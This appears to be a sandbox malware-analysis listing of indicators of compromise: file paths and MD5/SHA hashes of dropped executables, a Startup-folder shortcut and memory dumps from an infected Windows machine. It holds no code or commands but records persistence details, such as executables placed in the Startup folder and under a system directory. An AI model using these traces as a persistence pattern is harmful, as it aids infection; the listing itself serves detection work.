C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe

MD5 89e3cb825a0a2a7fa4888ea66802dc13
SHA1 61025242fda034cd76f7c44860327465b303f69a
SHA256 47071488c86f41bcb9e15ee233484afe5dd801d40ecc989351254e704d6b2480
SHA512 f76c6e2fbc69bde418fd39d66f12ae84e61d30217a32b9f01dfdc8cbf14318a4a6435cdcdc35ca83b162dee99eb5a9667b1f4dff968e7d873d39abcf0703c843

memory/2480-872-0x0000000000390000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 051a74485331f9d9f5014e58ec71566c
SHA1 4ed0256a84f2e95609a0b4d5c249bca624db8fe4
SHA256 3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888
SHA512 1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 856900844f6f1c326c89d0bcfb2f0c28
SHA1 1caad440d46fa8c0cbed4822b4be2bbdddba97c2
SHA256 ae24414ec53b3ae43ddbf1ff7b6643f8bf45281406f6415742f4305360d70a32
SHA512 ed8f421e151d797b33440dd0ddb6d6a5ec93fe7806ad82c60af3f77d545cf5dc319bce67804bd0613bb551a3f01648ec0d1918805dc7342145c8bb23ad12cab4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f0e62045515b66d0a0105abc22dbf19
SHA1 894d685122f3f3c9a3457df2f0b12b0e851b394c
SHA256 529811e4d3496c559f3bd92cd877b93b719c3ac4834202aa76ab9e16e25f9319
SHA512 f78426df6032ee77f8c463446ab1c6bb4669ef7a2463dead831ec4ff83a07d7dc702d79372d8bcaf4594bf0fb6e11e9f027f3e0325de9b19be5f51b7b80ed54a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b0a85f07903eaad4aace8865ff28679f
SHA1 caa147464cf2e31bf9b482c3ba3c5c71951566d1
SHA256 c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5
SHA512 7a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe

MD5 10194be78216b8b290e3d8d02055957b
SHA1 d5b42c116a56ca0fb507de577db183e5e740fe77
SHA256 33ba879b2eec97789475dfea751a38002c0b89d7f61f610b6ead2fe18d6ee7e5
SHA512 35b55168d8fb6632e176eaf8d74e9e8c50b27c0057e0c72098e81df55d6bd969a53c9138ef2b3486f5a32186d4294dd2e9c50d4f5842572dad698237fc9021ed

memory/3672-1154-0x0000000000DB0000-0x0000000000DCA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe

MD5 885df3eabb13cba468d3fe060b7561b0
SHA1 9deeff0eabfc2f9ca0c8b2cd07a77565d0c5a376
SHA256 8deb77e4f3cd316b63a1cefc208f9598533543639e143ea9867c4a93ebfe9de5
SHA512 95f2b9e9a5e797508f28006163c737fb1b67c4ad7337fe65a6b63a3c7483f2014c66201f74bf1181d1add3414953eb4080be478b9fab7d8f4c30fb72d5fe540e

memory/4672-1181-0x0000000000AA0000-0x0000000000B38000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e8a7ab7bae6a69946da69507ee7ae7b0
SHA1 b367c72fa4948493819e1c32c32239aa6e78c252
SHA256 cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272
SHA512 89b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683

memory/4672-1206-0x000000001CB10000-0x000000001CB4A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 190b28f40c0edd3cc08d0fd3aca4779a
SHA1 425b98532b6a18aa2baece47605f1cf6c8cfbd11
SHA256 8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce
SHA512 8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 04493ed4421328d5e40252891bfe515a
SHA1 ab8a4e3909ff849549ea989049ed30b490f274e7
SHA256 3b14b48326a1201fc8b9667201c15392e52f7f5819c2aadafe19cbb72b08be51
SHA512 c8ca89143763a72f4ce8f10ffa2e161b59d41454bad0f71fcb4c7e9c8861a5d99bdc787907761bfb8439afad1f0557a1338bbb1054f5810de807633f515d5a76

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7e46b66e9b3609911fdf14d0a418d978
SHA1 acd24b967cc801ecda3ae93dd0be6fd2a2ee5c9d
SHA256 81a642f2a14ab788978ed3a247432048cb6feb5be3cd40e276022562a4b7aa06
SHA512 55b3f342fd0e097dd5028159d82d0b2c9f24669e334cc020c8c054e888157f2d67d6e618517900f4ee9a1f107c8ae6f9ae55d2f09833f6565964cfaa7fc0777e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a79484020d1fe82f2f791cc2582b5dec
SHA1 1c74da2b600fe1ac4ef9b41993b36fa6241c9e86
SHA256 1c01ed1958207ff2e3a14430bd89b912a0ad28191817767764454ba0be1d4344
SHA512 e2a0bd264bc608c67eddfc333672b7cc201c35efd224bbc7f299a3fae6c3d18c8974fe8788dd90508a1f1b191ec53a0c8624c6285b011467ce71c4b82626fd04

memory/1540-1935-0x000000001B490000-0x000000001B49E000-memory.dmp

memory/3672-1943-0x000000001C8F0000-0x000000001C8FA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x4Malicious.log

MD5 2cbbb74b7da1f720b48ed31085cbd5b8
SHA1 79caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256 e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512 ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk

MD5 7350b6b2078259137bddad4ac88b96f1
SHA1 d337d07890b665dd75068caa974847d451987225
SHA256 1bd7ca6a81e76575f13076f3e80cdf95313a3ea0bf92c93babdf6d04e13cb606
SHA512 795ac4f3fd22e89a068bd7e8cb140af6bfcd13738969ea997291b80b5f26177a59f5f5f907f95edcd2cbea0e2127a997f2c77e56ddf89921bf608f7d6114869c

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 8a86027e38ee15c51ee8865e6779ab0a
SHA1 19cdd9b88623ea87477cebe7a91b63d48b07b32c
SHA256 8210ee235cdf19788bc17d4ce419f1d79151b9aeaabf87a0ba7c6218acffc960
SHA512 1ebf96a07b29fe9d70216fbbd5ba86dacca0e87b0416c2318e608068b224f80e03aae2c2f9f3302889d65f4623d25fe7d1ffa2c1324ae98ed60106c2fc9f46d2

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 cb76d822faa7e952296300763bed64cf
SHA1 bd5477001d6f96ea7b640c2d0da9e0bc293bc090
SHA256 a4e304483c0ee4a73013c996f3bf98923ccef56381faed53f3ce72833ecf8ded
SHA512 12c835c94dd83ce7fee4439284f8d17d44a375e0de2d672370d7842f30c1efffd855be07a65756225e72405f4ed629936116b8b14e81d8147ab573bae64ebbf7

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 1e5ca1a3b67a5dfca2d4cdaa4b09778e
SHA1 532c39f79f0dc03756f49cf167eb4055d6e16f98
SHA256 0f7cb79b5948a8aeefaae9432a1123baf8cedb5245d240d066652cb9019cebcf
SHA512 8327d747cdf5e0376310def9d4f7cb2679b471be4224944bd61effc4565e3db6a4e2a9dda4ae855d60110f672b1386f944b673e421b2e29f4a87d0c9133bc581

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 73f929ae27a3b93357b9eb4706764d5e
SHA1 492d30941e5dbb69c560001184a5131775ce35d9
SHA256 7dec5e315a78b45e6cab16960c46d768482866a142a88bd6bad1c5a3e213d549
SHA512 bb82b73be2cd8d766a6e2eaf024770e7463d570d7207ca8b9868534757fd06b219c32627fc69a6413ee30ee23d7d76c41936a512b58a7e413de993083979a7e8

C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

MD5 a88cbd0d52f4c6c36104206331ce657d
SHA1 4fbd087d18822c11f13a718c7ce26889f05c4060
SHA256 e1e9094acc4260860125efb556839783182cfb401aa059e590e91a1619b5b665
SHA512 48d360777f4156c3aa8404f15f92e08c99f1c1ba304bd4368b0486ee8c915427d0f3836b958ea4eb64be4e9d4a57023def86b115ed6d74403e66845adab876cb

C:\Users\Admin\AppData\Local\Microsoft\Windows\Themes\Custom.theme

MD5 1b1ea000d772f4e993de6834c17b755d
SHA1 913f449a9932c0bd42eb748487bf8cfd8134c4a9
SHA256 6449d0a3f0356b243a5b5b6570036f0bc3471ec8c764d60c23ba155013beb7f4
SHA512 ab316d98bd21cd28612ecbd381202b9e65ccebca770ec9a59b0d79dafa9bdcf4a58941532035c3a48a604fdaf3bfcd4bff6b4981e7c56d67ce11b6c2d907b5a5

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 26f17ae18099bfd0e81964751c8f5953
SHA1 29f8f79c7d3ac8dfd402ae3a282141b7d4c07d32
SHA256 730450b0d680be5cdb5de85546af077128cb24a42c6f419b86df8b072219dc7c
SHA512 879d1a2c8a1c32f0db84b840a72c257ecb7ec64435874b14d34073610227b0e078b27a8bb6f37e36e21442771daaf950ff9bd24e452eafdea5c196b607f872b2

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 4c23ed218b1b803aa3772d963d486fc4
SHA1 26c5a361572a4bbbc7e237d5d25feba2093c9f12
SHA256 d5aaa288fb1b7c3e00580f6fc5d580ba25d1a36721d479ea068625056ed85d05
SHA512 97967f330577cd913eee1f6f687799b6a73d2b4ec39eebcabdb910d3b25aa8fa81bfa88d8bd84a78d0f005d1ab789f60fa346852b8bd134f622f27f094d7e3fc

C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 b0a40f6847934b610c24822c5c1e60b4
SHA1 7a984562d0765a185ab4af0f6b574b326410e7eb
SHA256 baa3c6350471601390dda37570a20a23567c582df132eb0fbe997f36ac831da2
SHA512 05453981b9bd66438c4e707a2763e00f58929f41bc2802f01ba240f3d7d46a6f2a7be9c28192ba783ef42c33d0f1e50766a70edbd61e8c48f299e0da75712a8f

C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

C:\Users\Admin\AppData\Local\D3DSCache\d1045fa42060dcaf\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 2e286dd0367aaf12ac7a61923b48c1e6
SHA1 6757cfcc28a86552fa5d535bd8e2c247ef7b722d
SHA256 d33e3afd37e7150f69f78c16355a039925bb53b624587ef37727f8954c801973
SHA512 c347fd6731e59da059863918e3bafa07bd50ea8f3e6f88ad8837b3301c3971376a0665d081df3d8501ae5538a306a97f06e237e679ea3bd725256cb497307511